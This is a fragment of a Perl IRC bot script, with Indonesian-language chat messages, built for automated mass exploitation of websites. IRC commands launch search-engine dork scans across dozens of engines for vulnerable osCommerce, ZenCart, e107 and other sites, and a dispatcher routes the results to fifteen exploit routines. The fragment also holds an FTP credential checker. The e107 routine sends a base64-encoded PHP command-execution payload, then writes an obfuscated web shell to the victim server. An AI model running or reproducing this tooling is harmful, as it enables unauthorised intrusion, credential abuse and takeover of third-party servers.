				if ($msg =~ /^$rfgcmd\s+(.*)/) {
 					if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
 						my ($bug,$dork) = ("apalah",$1);
 						my $simpan = 'situs.txt';
 						&msg("$path","9,1[4!9]15 Lapor 4<9=4> 15lagi scan RFG di 4$path ");
 						&msg("$path","$rfglogo9,1Dork 4<9=4>15 $dork ");
 						&msg("$path","$rfglogo9Search Engine 4,1<9=4>15,1 Now Loading ... ");
						&msg("$path","$rfglogo7ATTENTION : 8,1Don't flood the bot.. 11OK!!!");
 						sendraw("MODE $path +m");
						&se_start($path,$bug,$dork,$engine,9,$nick);
 				}
 			}
 		}
		if ($msg =~ /^$oscocmd\s+(.*)/) {
					if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
					my $dork = $1;
					if (&isFound($amma,"c0Vt=")) {
						my $simpan = 'situs.txt';
							&msg("$path","9,1[4!9]15 Lapor 4<9=4> 15lagi scan Oscommerce di 4$path ");
							&msg("$path","$oscologo9,1Dork 4<9=4>15 $dork ");
							&msg("$path","$oscologo9Search Engine 4,1<9=4>15,1 Now Loading ... ");
							&msg("$path","$oscologo7ATTENTION : 8,1Don't flood the bot.. 11OK!!!");
							sendraw("MODE $path +m");
							&se_start($path,$bug,$dork,$engine,10,$nick);
							} else {
							&msg("$path","9,1[4!9]Injector 4<9=4>15 Lost!!! "); exit;
							}
						}
					}
				}
				if ($msg =~ /^$zencmd\s+(.*)/) {
                	if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
						if (-e ($osc_shell)) {
						my $dork = $1;
						my $simpan = 'situs.txt';
						&msg("$path","9,1[4!9]15 Lapor 4<9=4> 15lagi scan ZenCart di 4$path ");
						&msg("$path","$zenlogo9,1Dork 4<9=4>15 $dork ");
						&msg("$path","$zenlogo9Search Engine 4,1<9=4>15,1 Now Loading ... ");
						&msg("$path","$zenlogo7ATTENTION : 8,1Don't flood the bot.. 11OK!!!");
						sendraw("MODE $path +m");
						&se_start($path,$bug,$dork,$engine,11,$nick);
						}
					}
				}
				if ($msg =~ /^$ftpcmd\s+(.+?)\s+(.*)\s+(.*)/) {
				my $url = $_[0];
				my $host = $_[1];
				my $user = $_[2];
				my $pass = $_[3];
					if (my $pid = fork) {
						waitpid($pid, 0);
					} else {
						if (fork) { exit; } else {
				my ($host,$user,$pass) = ($1,$2,$3);
					&msg("$path","9,1[4!9]FTP 4<9=4>15 Checking $host | $user:$pass");
					my $success = 1;
					use Net::FTP;
					my $ftp = Net::FTP->new($host, Debug => 0, Timeout => 5);
					$success = 0 if $ftp->login($user,$pass);
					$ftp->quit;
					if ($success == 0) {
						&notice("$nick","15,1 [9FTP15] [ 9http://".$host." 15] [".$user.":".$pass."15] 9Success ");
						} else {
						&notice("$nick","15,1 [9FTP15] [ 9http://".$host." 15] [".$user.":".$pass."15] 4Denied ");

					}
				}
			}
		}
	}
}
        for(my $c=0; $c<= $#lines; $c++) {
            $line = $lines[$c];
            $line = $line_temp.$line if ($line_temp);
            $line_temp = '';
            $line =~ s/\r$//;
            unless ($c == $#lines) {

                parse("$line");
            } else {
                if ($#lines == 0) {
                    parse("$line");
                } elsif ($lines[$c] =~ /\r$/) {
                    parse("$line");
                } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
                    parse("$line");
                } else {
                    $line_temp = $line;
                }
            }
        }
    }
}

##################################################################################

sub type() {
my ($chan,$bug,$dork,$engine,$type,$nick) = @_;
	if ($type == 1){$type=&thumb_exploit($chan,$bug,$dork,$engine,$nick);}
	elsif ($type == 2){$type=&whmcs_exploit($chan,$bug,$dork,$engine,$nick);}
	elsif ($type == 3){$type=&lfi_exploit($chan,$bug,$dork,$engine,$nick);}
	elsif ($type == 4){$type=&zero_exploit($chan,$bug,$dork,$engine,$nick);}
	elsif ($type == 5){$type=&rfi_exploit($chan,$bug,$dork,$engine,$nick);}
	elsif ($type == 6){$type=&xml_exploit($chan,$bug,$dork,$engine,$nick);}
	elsif ($type == 7){$type=&e107_exploit($chan,$bug,$dork,$engine,$nick);}
	elsif ($type == 8){$type=&ih_exploit($chan,$bug,$dork,$engine,$nick);}
	elsif ($type == 9){$type=&rfg_exploit($chan,$bug,$dork,$engine,$nick);}
	elsif ($type == 10){$type=&osco_exploit($chan,$bug,$dork,$engine,$nick);}
	elsif ($type == 11){$type=&zen_exploit($chan,$bug,$dork,$engine,$nick);}
	elsif ($type == 12){$type=&sql_exploit($chan,$bug,$dork,$engine,$nick);}
	elsif ($type == 13){$type=&mmfc_exploit($chan,$bug,$dork,$engine,$nick);}
	elsif ($type == 14){$type=&avm_exploit($chan,$bug,$dork,$engine,$nick);}
	elsif ($type == 15){$type=&jce_exploit($chan,$bug,$dork,$engine,$nick);}
}

##################################################################################

sub se_start() {
my ($chan,$bug,$dork,$engine,$type,$nick) = @_;
	if ($gps ==1) {
	if ($engine =~ /commercial/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Commercial",$type,$nick); } exit; } }
	if ($engine =~ /network/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Network",$type,$nick); } exit; } }
	if ($engine =~ /united/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"UniTed",$type,$nick); } exit; } }
	if ($engine =~ /poland/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Poland",$type,$nick); } exit; } }
	if ($engine =~ /rusia/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Russian",$type,$nick); } exit; } }
	if ($engine =~ /turkey/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Turkey",$type,$nick); } exit; } }
	if ($engine =~ /ukraine/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Ukraine",$type,$nick); } exit; } }
	if ($engine =~ /australia/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Australia",$type,$nick); } exit; } }
	if ($engine =~ /netherlands/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Netherlands",$type,$nick); } exit; } }
	if ($engine =~ /brazil/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Brazil",$type,$nick); } exit; } }
	if ($engine =~ /czech/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Czech",$type,$nick); } exit; } }
	if ($engine =~ /kingdom/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Kingdom",$type,$nick); } exit; } }
	if ($engine =~ /canada/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Canada",$type,$nick); } exit; } }
	if ($engine =~ /romania/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Romania",$type,$nick); } exit; } }
	if ($engine =~ /ask2/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AsK2",$type,$nick); } exit; } }
	if ($engine =~ /google/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLe",$type,$nick); } exit; } }
	if ($engine =~ /google2/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLe2",$type,$nick); } exit; } }
	if ($engine =~ /papa/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"PaPa",$type,$nick); } exit; } }
	if ($engine =~ /gigablast/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GiGaBLaST",$type,$nick); } exit; } }
	if ($engine =~ /snz/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"SnZ",$type,$nick); } exit; } }
	if ($engine =~ /belarus/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Belarus",$type,$nick); } exit; } }
	if ($engine =~ /moldova/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Moldova",$type,$nick); } exit; } }
	
	if ($engine =~ /cocos/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Cocos",$type,$nick); } exit; } }
	if ($engine =~ /proffessional/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Proffessional",$type,$nick); } exit; } }
	if ($engine =~ /biz/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Biz",$type,$nick); } exit; } }
	if ($engine =~ /nadji/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"NadJi",$type,$nick); } exit; } }
	if ($engine =~ /germany/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Germany",$type,$nick); } exit; } }
	if ($engine =~ /organization/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Organization",$type,$nick); } exit; } }
	if ($engine =~ /territory/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Territory",$type,$nick); } exit; } }
	if ($engine =~ /chile/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Chile",$type,$nick); } exit; } }
	if ($engine =~ /information/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Information",$type,$nick); } exit; } }
	if ($engine =~ /mozambique/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Mozambique",$type,$nick); } exit; } }
	if ($engine =~ /iceland/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Iceland",$type,$nick); } exit; } }
	if ($engine =~ /austria/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Austria",$type,$nick); } exit; } }
	if ($engine =~ /greece/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Greece",$type,$nick); } exit; } }
	if ($engine =~ /india/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"India",$type,$nick); } exit; } }
	if ($engine =~ /malaysia/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Malaysia",$type,$nick); } exit; } }
	if ($engine =~ /europe/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Europe",$type,$nick); } exit; } }
	if ($engine =~ /japan/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Japan",$type,$nick); } exit; } }
	if ($engine =~ /samoa/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Samoa",$type,$nick); } exit; } }
	if ($engine =~ /thailand/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Thailand",$type,$nick); } exit; } }
	if ($engine =~ /morocco/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Morocco",$type,$nick); } exit; } }
	if ($engine =~ /france/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"France",$type,$nick); } exit; } }
	if ($engine =~ /sweden/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Sweden",$type,$nick); } exit; } }
	if ($engine =~ /italy/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Italy",$type,$nick); } exit; } }
	
	if ($engine =~ /andorra/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Andorra",$type,$nick); } exit; } }
	if ($engine =~ /helena/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Helena",$type,$nick); } exit; } }
	if ($engine =~ /portugal/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Portugal",$type,$nick); } exit; } }
	if ($engine =~ /israel/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Israel",$type,$nick); } exit; } }
	if ($engine =~ /argentina/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Argentina",$type,$nick); } exit; } }
	if ($engine =~ /hungary/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Hungary",$type,$nick); } exit; } }
	if ($engine =~ /mexico/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Mexico",$type,$nick); } exit; } }
	if ($engine =~ /bulgaria/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Bulgaria",$type,$nick); } exit; } }
	if ($engine =~ /bolivia/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Bolivia",$type,$nick); } exit; } }
	if ($engine =~ /slovenia/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Slovenia",$type,$nick); } exit; } }
	if ($engine =~ /switzerland/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Switzerland",$type,$nick); } exit; } }
	if ($engine =~ /latvia/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Latvia",$type,$nick); } exit; } }
	if ($engine =~ /kenya/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Kenya",$type,$nick); } exit; } }
	if ($engine =~ /singapore/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Singapore",$type,$nick); } exit; } }
	if ($engine =~ /kazakhstan/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Kazakhstan",$type,$nick); } exit; } }
	if ($engine =~ /vietnam/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Vietnam",$type,$nick); } exit; } }
	if ($engine =~ /lithuania/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Lithuania",$type,$nick); } exit; } }
	if ($engine =~ /spain/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Spain",$type,$nick); } exit; } }
	if ($engine =~ /indonesia/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Indonesia",$type,$nick); } exit; } }
	if ($engine =~ /cada/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"CaDa",$type,$nick); } exit; } }
	if ($engine =~ /gutser/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GuTSeR",$type,$nick); } exit; } }
	}
	if ($gps2 ==1) {
	if ($engine =~ /bing/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Bing",$type,$nick); } exit; } }
	if ($engine =~ /biglobe/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BigLobe",$type,$nick); } exit; } }
	if ($engine =~ /walla/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"WaLLa",$type,$nick); } exit; } }
	if ($engine =~ /yahoo/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"YaHoo",$type,$nick); } exit; } }
	if ($engine =~ /ask/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AsK",$type,$nick); } exit; } }
	if ($engine =~ /uol/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"UoL",$type,$nick); } exit; } }
	if ($engine =~ /onet/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"OnEt",$type,$nick); } exit; } }
	if ($engine =~ /clusty/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"CLusTy",$type,$nick); } exit; } }
	if ($engine =~ /sapo/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"SaPo",$type,$nick); } exit; } }
	if ($engine =~ /aol/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AoL",$type,$nick); } exit; } }
	if ($engine =~ /lycos/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"LyCos",$type,$nick); } exit; } }
	if ($engine =~ /witch/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"WitCh",$type,$nick); } exit; } }
	if ($engine =~ /pagina/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"PaGiNa",$type,$nick); } exit; } }
	if ($engine =~ /webcrawler/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"WeBCrawLeR",$type,$nick); } exit; } }
	if ($engine =~ /bypass/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"ByPass",$type,$nick); } exit; } }
	if ($engine =~ /bypass2/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"ByPass2",$type,$nick); } exit; } }
	if ($engine =~ /rambler/i) { if ($pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"RambLer",$type); } exit; } }
	if ($engine =~ /mama/i) { if ($pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"MaMa",$type); } exit; } }
	if ($engine =~ /msn/i) { if ($pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Msn",$type); } exit; } }
	
	if ($engine =~ /hotbot/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"HotBot",$type,$nick); } exit; } }
	if ($engine =~ /seznam/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"SeZNam",$type,$nick); } exit; } }
	if ($engine =~ /izito/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"IzItO",$type,$nick); } exit; } }
	if ($engine =~ /volunia/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"VolUnIa",$type,$nick); } exit; } }
	if ($engine =~ /teoma/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"TeoMa",$type,$nick); } exit; } }
	if ($engine =~ /dogpile/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"DogPile",$type,$nick); } exit; } }
	if ($engine =~ /mywebsearch/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"MyWeBSearcH",$type,$nick); } exit; } }
	if ($engine =~ /gibla/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GiBLa",$type,$nick); } exit; } }
	if ($engine =~ /baidu/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BaiDu",$type,$nick); } exit; } }
	if ($engine =~ /kvasir/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"KvaSiR",$type,$nick); } exit; } }
	if ($engine =~ /amidalla/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"aMidaLLa",$type,$nick); } exit; } }
	if ($engine =~ /amfibi/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AmFibi",$type,$nick); } exit; } }
	if ($engine =~ /ananzi/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AnAnZi",$type,$nick); } exit; } }
	if ($engine =~ /ricerca/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"RiCeRca",$type,$nick); } exit; } }
	if ($engine =~ /yahoohk/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"YahooHK",$type,$nick); } exit; } }
	if ($engine =~ /dmoz/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"DmoZ",$type,$nick); } exit; } }
	if ($engine =~ /fireball/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"FiReBaLL",$type,$nick); } exit; } }
	if ($engine =~ /avg/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AvG",$type,$nick); } exit; } }
	if ($engine =~ /iamsearch/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"IaMSeaCrh",$type,$nick); } exit; } }
	}
}


###### EXPLOITING #######
sub e107_exploit() {
	my $chan = $_[0];
	my $bug = $_[1];
	my $dork = $_[2];
	my $engine = $_[3];
	my $nick = $_[4];
	my $count = 0;
	my @totexploit = &search_engine($chan,$bug,$dork,$engine,$e107logo);
	my $num = scalar(@totexploit);
	if ($num > 0){
		foreach my $site(@totexploit){
		$count++;
		if ($count == $num-1) { &msg("$chan","$e107logo15$engine 9Finished Gan..."); }
			my $test = "http://".$site.$bug;
			my $shellz = "http://".$site."/images/sem.php";
			my $code = "ZWNobyAidjBwQ3Izdzxicj4iOw0KZWNobyAic3lzOiIucGhwX3VuYW1lKCkuIjxicj4iOw0KJGNtZD0iZWNobyBub2IwZHlDcjN3IjsNCiRlc2VndWljbWQ9ZXgoJGNtZCk7DQplY2hvICRlc2VndWljbWQ7DQpmdW5jdGlvbiBleCgkY2ZlKXsNCiRyZXMgPSAnJzsNCmlmICghZW1wdHkoJGNmZSkpew0KaWYoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpew0KQGV4ZWMoJGNmZSwkcmVzKTsNCiRyZXMgPSBqb2luKCJcbiIsJHJlcyk7DQp9DQplbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdzaGVsbF9leGVjJykpew0KJHJlcyA9IEBzaGVsbF9leGVjKCRjZmUpOw0KfQ0KZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygnc3lzdGVtJykpew0KQG9iX3N0YXJ0KCk7DQpAc3lzdGVtKCRjZmUpOw0KJHJlcyA9IEBvYl9nZXRfY29udGVudHMoKTsNCkBvYl9lbmRfY2xlYW4oKTsNCn0NCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3Bhc3N0aHJ1Jykpew0KQG9iX3N0YXJ0KCk7DQpAcGFzc3RocnUoJGNmZSk7DQokcmVzID0gQG9iX2dldF9jb250ZW50cygpOw0KQG9iX2VuZF9jbGVhbigpOw0KfQ0KZWxzZWlmKEBpc19yZXNvdXJjZSgkZiA9IEBwb3BlbigkY2ZlLCJyIikpKXsNCiRyZXMgPSAiIjsNCndoaWxlKCFAZmVvZigkZikpIHsgJHJlcyAuPSBAZnJlYWQoJGYsMTAyNCk7IH0NCkBwY2xvc2UoJGYpOw0KfX0NCnJldHVybiAkcmVzOw0KfQ==";
			if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
			my $html = &e107_rce_query($test,$code);
			if ($html =~ /v0pCr3w<br>sys:(.+?)<br>nob0dyCr3w/) {
				my $sys = $1;
				my $upload = "JGM9Z3ppbmZsYXRlKHN0cl9yb3QxMyhiYXNlNjRfZGVjb2RlKCJyVWw2UXVOVEVQNWNKUDdEc3MzSmpnNGNxRWZwQkRGcWxKZ1N0UkFhSi8wQ3lHWHNXcktIdmJacDErUkZ4SC92eks2ZGwrT09SZWtpb1Rnenp6TXZ6ODZPNlg0czUrWHVqbTlYOFU5UlY4ZEZ1KzJUM1IwbWNpRWp5Y3BQZHk1ejdpRWErWlM0ZTF3cHB0MUpGQVp1MkI5YzN6cVQrR2I4NE55MzJ6ODk3ZTYwSHJuaU9pa3FvWWxDRG9IVVRiQUpQQ0p1K0dvd3ZLV1hvOUZhWnprSVZQUWUzVng4M21VUGc3L0dUamlLeHNPK0JWbUtad2tJR3FjeFRNWnZVNERCRWxydUJJWlRQbEtZaXFjc1Axa1pRRDlrd2FNWlIrbWdNY3FMbERtcitrckFObXgzS1paSGt1c2xoQS9QTG9Mb2Q5QUxJTURnNG9LZVBJTUttVyt2b0s0QmNVVXpURExwVU1ac29mUnhLZUtjdWF1T0hQc2RuZlZ0VUpDcDdwazk2RTlQa08rUmhzSFZZQlI1a1BLWWRDNk5VaHAwc2ZJU3lSYWZjM1h6a2lLbis0UWFuZWcrdll3Vno4aGlheWl4SUdhdHkrTkJwMFFLTkhpYXVSUDlHeEl5K2Npd2pMcUhPMDdBMmpjQ0Z4TE1XcVhVMVAzaTBPc3pYbGoxQXZIK3ZkR0lRdDF6WTM0UFU3ZEJraFdDNGREZ3pLaWlrZ25ibkFJblBCLzJZbFBSVXYvUDRQcnNLbVBNSktSWmRrSDhOYW8zT0I5ZkJkZWpkVGdZakp4N2oya1c1UUVYVmtrQkZKOFZ6OHVNYkREa09DT1NUSkY2dm4xdkE3WjZBejlqZ0k3Zk5FREhhWUFBbE13TFQ3dWE2NHlkanNVZm9rc0laVUJQUmpzSjV5ekx1aDNyN1VHaytjTmhkOXEwZ0t1bStEL00vNFVrVWdhbjl2TUg4d0hnS2ZWSnVUM2E3VmxKNUJZWW93b08zYWN1OWFEVkNBeWdqelpUdCszUjlsdG1qSUVBelVjODlWcWtmQW1QRUc2VndxTnh0bW5Pdm1saGx2V21mR3VJa0pEaXNWT1ZPZEwyYVpoMkpSSU5DNDJVQzFWVFk4YVNVbmRpVzRJbU81R3R5a3BOeXJKREx2cjNuWTV3QnRLNDl0Q1hNVzVjN1lNaloxV21LeWtJVFR3QU55Zjh0RzQzMDE3YnY1WGk3dTcvNUFEMDk1UFVpVU15QnlTVE9jbGttWURTTjdoZFZuazA4Q2s5ZlYzUTh5TFBicTgwQW1tNUtDdGE5TEp4UHRYc2k2WUVOZloya3FkbjJ4dEprNXl2L1RZT0pZOWtTWm5mRDREdllIS256c2xwcFF3T3lJVElxMW56RWw0N0JtcVF4anBoS21MYXdXSCtvNFZrbVJWa1Z5NXJ4bGtiSFZHLzZIUE8wNVNKdWsxeWVOOENXWUZmdTJRMjhTZXRabjZ3MFY2dDRwb3REUHVZZVJheEVSL1Z0T3lqWCtzOGdpM3dnWklFMXJyeWFMeFNzRkxXUGpyUkszcDZ3MXZ5WWF4TFIreldzZVJ6eVVtR2tXWGM5dVg2RHV5MVdSME5weTRIVlVMR2JwWXlZZUh3MW5Za1pPNEJkRUJ6RHZQaWtWSTJPbGdqQkxqZnBPaThqQ3dOTnUrcUdzK2txWXY1SWFHd1c3dFVtcW1BdHlSWVpDODhFN3VReVpZL3JKSUUvZ0VpR2xuZTErRmdiQjMzQ0QwaHorYTJ2UkM1SHZwVGNyZ2pVN0xhbWFmbXpRV3NjeVZTN0F0S1RjR2JjcWsweTUyTlpidWxjWnRiRUtjbGxpeTJrNEtSYnVLVWYyZHIrSTdJYjRGQzd3emVobVV4Ykh0YTd6VDh6WmlkSm9kNjUrUHB2dz09IikpKTsNCiRmaWNoaWVyID0gZm9wZW4oJy4vaW1hZ2VzL25ld3Nwb3N0X2ltYWdlcy9va3UucGhwJywndycpOw0KZndyaXRlKCRmaWNoaWVyLCAkYyk7DQpmY2xvc2UoJGZpY2hpZXIpOw0K";
